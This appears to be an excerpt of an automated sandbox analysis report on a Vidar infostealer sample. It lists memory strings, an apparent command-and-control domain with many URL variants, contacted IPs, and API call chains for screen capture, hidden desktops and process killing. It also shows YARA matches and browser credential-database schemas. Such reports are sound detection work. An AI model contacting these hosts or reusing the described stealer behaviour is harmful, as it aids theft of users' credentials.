              Source: chrome.exe, 00000006.00000003.2662454015.000042E800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: chrome.exe, 00000006.00000003.2662454015.000042E800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: chrome.exe, 00000006.00000002.2718820448.000042E800438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
              Source: chromecache_70.8.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
              Source: chromecache_70.8.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
              Source: chromecache_70.8.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
              Source: chrome.exe, 00000006.00000003.2674794061.000042E801370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
              Source: chrome.exe, 00000006.00000003.2674278051.000042E800F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2672556821.000042E801354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2674861035.000042E801448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2672218090.000042E801354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2729053325.000042E8013A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2674311362.000042E801354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2673147626.000042E8013A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2674794061.000042E801370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
              Source: chrome.exe, 00000006.00000002.2728972284.000042E801394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2672671250.000042E80140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721163304.000042E800A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.Bvq7OK2_7ZA.2019.O/rt=j/m=q_dnp
              Source: chrome.exe, 00000006.00000002.2728972284.000042E801394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2672671250.000042E80140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.S4XVq7ljTQU.L.W.O/m=qmd
              Source: BitLockerToGo.exe, 00000004.00000002.3079848215.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: BitLockerToGo.exe, 00000004.00000002.3079848215.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: BitLockerToGo.exe, 00000004.00000002.3079848215.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: BitLockerToGo.exe, 00000004.00000002.3079848215.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BitLockerToGo.exe, 00000004.00000002.3079848215.000000000595C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718165993.000042E8002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
              Source: BitLockerToGo.exe, 00000004.00000003.2560931190.0000000002D94000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2547614534.0000000002D90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.2010
              Source: BitLockerToGo.exe, 00000004.00000003.2533843264.0000000002DC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz
              Source: BitLockerToGo.exe, 00000004.00000002.3077779603.0000000005372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/
              Source: BitLockerToGo.exe, 00000004.00000003.2560931190.0000000002D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/&=c
              Source: BitLockerToGo.exe, 00000004.00000002.3076528162.00000000050B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/0
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/2
              Source: BitLockerToGo.exe, 00000004.00000002.3077779603.00000000053D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/?
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/H4
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/J#
              Source: BitLockerToGo.exe, 00000004.00000002.3077779603.00000000053D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/_
              Source: BitLockerToGo.exe, 00000004.00000002.3077779603.0000000005372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/data;
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/e#
              Source: BitLockerToGo.exe, 00000004.00000003.2560931190.0000000002D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/f--
              Source: BitLockerToGo.exe, 00000004.00000003.2560931190.0000000002D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/n
              Source: BitLockerToGo.exe, 00000004.00000002.3077779603.0000000005372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/tallShield
              Source: BitLockerToGo.exe, 00000004.00000002.3076528162.00000000050B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/tem32
              Source: BitLockerToGo.exe, 00000004.00000002.3077779603.0000000005513000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyz/x
              Source: BitLockerToGo.exe, 00000004.00000003.2547614534.0000000002D90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyzL
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyzT#
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyzb
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyzh#
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyzl
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyzo#
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xu3.201008281.xyzr#
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
              Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
              Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
              Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
              Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
              Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49893 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 88.99.124.230:443 -> 192.168.2.4:49902 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040EAB5 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,4_2_0040EAB5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00405AD3 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop,4_2_00405AD3

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a280000.4.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a47a000.6.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a47a000.6.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 4.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a260000.3.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2c0000.2.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2a0000.5.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a260000.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 4.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a280000.4.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 00000000.00000002.2206109646.000000000A396000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: 00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 00000000.00000002.2206109646.000000000A2C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 00000000.00000002.2206109646.000000000A260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 00000000.00000002.2206109646.000000000A280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 00000000.00000002.2206109646.000000000A2A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00404B3F4_2_00404B3F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004151474_2_00415147
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00417D564_2_00417D56
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040AF7E4_2_0040AF7E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004171E14_2_004171E1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004153AF4_2_004153AF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040D84A appears 136 times
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206109646.000000000A35C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a280000.4.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a47a000.6.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a47a000.6.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 4.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a260000.3.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2c0000.2.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2a0000.5.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a260000.3.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 4.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a280000.4.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 00000000.00000002.2206109646.000000000A396000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: 00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 00000000.00000002.2206109646.000000000A2C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 00000000.00000002.2206109646.000000000A260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 00000000.00000002.2206109646.000000000A280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 00000000.00000002.2206109646.000000000A2A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: ctr1d2.4.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/29@8/9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040F0CA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,4_2_0040F0CA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ZRHT417X.htmJump to behavior
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: chrome.exe, 00000006.00000002.2719578869.000042E800637000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
              Source: 9rieusr1n.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
